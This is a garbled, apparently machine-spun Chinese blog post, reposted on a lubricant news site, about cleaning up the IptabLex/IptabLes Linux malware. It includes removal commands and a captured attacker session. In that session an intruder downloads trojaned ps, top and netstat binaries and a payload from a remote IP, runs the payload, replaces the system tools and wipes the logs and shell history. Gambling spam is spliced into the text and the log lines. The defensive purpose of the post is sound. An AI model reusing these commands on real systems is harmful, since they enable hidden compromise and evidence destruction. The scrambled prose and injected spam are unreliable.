您的位置:网站首页 > 行业资讯 > 行业动态 > 正文

6y7y开奖结果内幕唯一官网

  2016-01-20 08:38  中国润滑油信息网
6y7y开奖结果内幕唯一官网

3、有些反常进程是随机名,kill后姓名会变更

4、反常进程端口号是随机端口

反常的进程是IptabLex的变种,处置惩罚进程相似:

再查来历,有这么几个文件:

/boot/IptabLes

/boot/IptabLex

/boot/.IptabLes

/boot/.IptabLex

# cat /boot/IptabLex

#!/bin/sh

/boot/.IptabLex

exit 0

# cat /boot/IptabLes

#!/bin/sh

/boot/.IptabLes

exit 0

.IptabLes 和 .IptabLes 文件,有可能是二进制文件

killall -9 scc

killall -9 .IptabLes

killall -9 .IptabLex

killall -9 profile; killall -9 profileh;

killall -9 install; killall -9 installh;

killall -9 office; killall -9 officeh;

killall -9 history

killall -9 node

rm -f /boot/*IptabLes

rm -f /boot/*IptabLex

rm -f /boot/..IptabLes

rm -f /etc/rc.d/IptabLex

rm -f /etc/rc.d/rc2.d/*IptabLex

rm -f /etc/rc.d/rc2.d/*IptabLes

rm -f /etc/rc.d/rc3.d/*IptabLex

rm -f /etc/rc.d/rc3.d/*IptabLes

rm -f /etc/rc.d/rc4.d/*IptabLex

rm -f /etc/rc.d/rc4.d/*IptabLes

rm -f /etc/rc.d/rc5.d/*IptabLex

rm -f /etc/rc.d/rc5.d/*IptabLes

rm -f /etc/rc.d/IptabLes

rm -f /usr/.IptabLes

rm -f /usr/.IptabLex

rm -f /etc/rc.d/init.d/IptabLe*

并将被替换的体系指令进行修正

下面是一台公网主机被黑的进程

(以下纪录颠末PROMPT_COMMAND体系情况变量后台抓取)

Nov 24 03:24:32 奸淫: [euid=root]::[/root]#

Nov 24 03:24:34 奸淫: [euid=root]::[/root]# history

Nov 24 03:26:52 奸淫: [euid=root]::[/root]# wget http://222.186.31.229:52636/libproc-3.2.5.so

Nov 24 03:26:55 奸淫: [euid=root]::[/root]# wget http://222.186.31.229:52636/ps

Nov 24 03:26:57 奸淫: [euid=root]::[/root]# wget http://222.186.31.229:52636/top

Nov 24 03:27:00 奸淫: [euid=root]::[/root]# wget http://222.186.31.229:52636/netstat

Nov 24 03:27:03 奸淫: [euid=root]::[/root]# chmod 777 ps

Nov 24 03:27:05 奸淫: [euid=root]::[/root]# chmod 777 top

Nov 24 03:27:08 奸淫: [euid=root]::[/root]# chmod 777 netstat

Nov 24 03:27:11 奸淫: [euid=root]::[/root]# cp libproc-3.2.5.so /usr/lib64

Nov 24 03:27:14 奸淫: [euid=root]::[/root]# rm -f /bin/ps

Nov 24 03:27:16 奸淫: [euid=root]::[/root]# rm -f /usr/bin/top

Nov 24 03:27:19 奸淫: [euid=root]::[/root]# rm -f /bin/netstat

Nov 24 03:27:21 奸淫: [euid=root]::[/root]# cp top /usr/bin

Nov 24 03:27:24 奸淫: [euid=root]::[/root]# cp ps /bin

Nov 24 03:27:29 奸淫: [euid=root]::[/root]# cp netstat /bin

Nov 24 03:27:33 奸淫: [euid=root]::[/root]# ps -ef

Nov 24 03:27:35 奸淫: [euid=root]::[/root]# 双色球六合彩1994top

Nov 24 03:27:38 奸淫: [euid=root]::[/root]# netstat -anp

Nov 24 03:27:40 奸淫: [euid=root]::[/root]# netstat -an

Nov 24 03:27:50 奸淫: [euid=root]::[/root]# wget http://222.186.31.229:52636/Internet

Nov 24 03:27:52 奸淫: [euid=root]::[/root]# chmod 0755 /root/Internet

Nov 24 03:27:56 奸淫: [euid=root]::[/root]# nohup /root/Internet > /dev/null 2>&1 &

Nov 24 03:27:57 奸淫: [euid=root]::[/root]# ls

Nov 24 03:28:01 奸淫: [euid=root]::[/root]# rm -rf Internet

Nov 24 03:28:03 奸淫: [euid=root]::[/root]# rm -rf ps

Nov 24 03:28:05 奸淫: [euid=root]::[/root]# rm -rf top

6y7y开奖结果内幕唯一官网Nov 24 03:28:08 奸淫: [euid=root]::[/root]# rm -rf libproc-3.2.5.so

Nov 24 03:28:10 奸淫: [euid=root]::[/root]# rm -rf netstat

Nov 24 03:28:10 奸淫: [euid=root]::[/root]# ls

Nov 24 03:28:14 奸淫: [euid=root]::[/root]# rm -rf fake.cfg

Nov 24 03:28:15 奸淫: [euid=root]::[/root]# ls

Nov 24 03:28:21 奸淫: [euid=root]::[/root]# rm -rf .bash_history

Nov 24 03:28:23 奸淫: [euid=root]::[/root]#

Nov 24 03:28:24 奸淫: [euid=root]::[/root]# history

Nov 24 03:28:30 奸淫: [euid=root]::[/root]# rm -rf /root/.bash_history

Nov 24 03:28:30 奸淫: [euid=root]::[/root]#

Nov 24 03:28:30 奸淫: [euid=root]::[/root]# echo>/var/log/syslog

Nov 24 03:28:30 奸淫: [euid=root]::[/root]# echo>/var/log/messages

Nov 24 03:28:30 奸淫: [euid=root]::[/root]# echo>/var/log/httpd/access_log

6y7y开奖结果内幕唯一官网

Nov 24 03:28:30 奸淫: [euid=root]::[/root]# echo>/var/log/httpd/error_log

Nov 24 03:28:30 奸淫: [euid=root]::[/root]# echo>/var/log/xferlog

Nov 24 03:28:30 奸淫: [euid=root]::[/root]# echo>/var/log/secure

Nov 24 03:28:30 奸淫: [euid=root]::[/root]# echo>/var/log/auth.log

Nov 24 03:28:30 奸淫: [euid=root]::[/root]# echo>/var/log/user.log

Nov 24 03:28:30 奸淫: [euid=root]::[/root]# echo>/var/log/wtmp

Nov 24 03:28:30 奸淫: [euid=root]::[/root]# echo>/var/log/lastlog

Nov 24 03:28:30 奸淫: [euid=root]::[/root]# echo>/var/log/btmp

Nov 24 03:28:30 奸淫: [euid=root]::[/root]# echo>/var/run/utmp

Nov 24 03:28:31 奸淫: [euid=root]::[/root]# rm -rf /root/.bash_history

Nov 24 03:28:31 奸淫: [euid=root]::[/root]#

Nov 24 03:28:31 奸淫: [euid=root]::[/root]# echo>/var/log/syslog

Nov 24 03:28:31 奸淫: [euid=root]::[/root]# echo>/var/log/messages

Nov 24 03:28:31 奸淫: [euid=root]::[/root]# echo>/var/log/httpd/acc通发娱乐ess_log

Nov 24 03:28:31 奸淫: [euid=root]::[/root]# echo>/var/log/httpd/error_log

Nov 24 03:28:31 奸淫: [euid=root]::[/root]# echo>/var/log/xferlog

Nov 24 03:28:31 奸淫: [euid=root]::[/root]# echo>/var/log/secure

Nov 24 03:28:31 奸淫: [euid=root]::[/root]# echo>/var/log/auth.log

Nov 24 03:28:31 奸淫: [euid=root]::[/root]# echo>/var/log/user.log

Nov 24 03:28:31 奸淫: [euid=root]::[/root]# echo>/var/log/wtmp

Nov 24 03:28:31 奸淫: [euid=root]::[/root]# echo>/var/log/lastlog

Nov 24 03:28:31 奸淫: [euid=root]::[/root]# echo>/var/log/btmp

Nov 24 03:28:31 奸淫: [euid=root]::[/root]# echo>/var/run/utmp

Nov 24 03:28:37 奸淫: [euid=root]::[/root]# rm -rf .bash_history

Nov 24 03:28:39 奸淫: [euid=root]::[/root]#

Nov 24 03:28:40 奸淫: [euid=root]::[/root]# history

中招后的天气:

1、主机发包严酷,堵塞收集

2、反常进程直接kill后会再次主动天生新的进程

以上处置惩罚根本能够办理问题

存在一种扎手的状况,歹意法度榜样会天生成堆相似体系进程的进程名,相似:

pwd

ps -ef

netstat -an

对付此类歹意进程,颠末kill是无法彻底拔除

需求拔除/lib/libgcc*的库文件,避免歹意法度榜样再次发动

1.拔除/etc/crontab 中那行udev的,一路拔除/etc/cron.hourly中udev.sh

2.netstat -enlp|more

kill进程中反常的端口和进程,无意偶尔是tcp无意偶尔有udp,进程名形如netstatps等,洁净净落后行下一步

3.rm -rf /lib/libgcc*

4.反省netstat -anlp netstat-enlp 均无反常进程和端口洞开

这篇文章出自 “cexpert” 博客,转发请与作者团结!

  本文系中国润滑油信息网(www.sinolub.com)原创作品,若需转载务必以超链接的形式注明出处,转载时严禁任何有悖原文的文字修改;本网有权对所有侵权行为进行责任追究。

分享到: QQ空间 新浪微博 人人网 开心网 腾讯微博 更多

相关新闻

友情提醒

本信息真实性未经中国润滑油信息网证实,仅供您参考。未经许可,请勿转载。已经本网授权使用的,应在授权范围内使用,并注明“来源:中国润滑油信息网”。

本网部分文章转载自其它媒体,转载目的在于传递更多行业信息,并不代表本网赞同其观点和对其真实性负责。在本网论坛上发表言论者,文责自负,本网有权在网站内转载或引用,论坛的言论不代表本网观点。本网所提供的信息,如需使用,请与原作者联系,版权归原作者所有。如果涉及版权需要同本网联系的,请在15日内进行。

官方微博

热点招商

奥吉星润滑油全国招商

奥吉星润滑油(天泰集团化工控股有限公司 股票代码:GTS)是由天泰控股的专业润滑油生产企业。 全国招商热线:400-0635-789

Gulf海湾石油面向全国招商

海湾石油(中国)有限公司是Gulf Oil International 在国内的唯一子公司。 现诚招经销商。 招商热线:0535-2161171

埃尼润滑油面向全国招商

埃尼是一家综合性能源企业,业务遍及83个国家,拥有84,000名员工,从事石油和天然气勘探、生产、运输、转化和营销活动,业务涉及化工、油田服务、建筑和工程领域。

关于我们|本网动态|广告服务|联系方式|免责声明|版权信息|法律顾问
CopyRight©2015-2016 Sinolub.Com All Rights Reserved 九鼎公司 版权所有
《中华人民共和国增值电信业务经营许可证》编号:粤B2-20050302
服务热线:0754-88650988 在线服务QQ:619128006 润滑油商机信息群:③:50693127 ④:65958932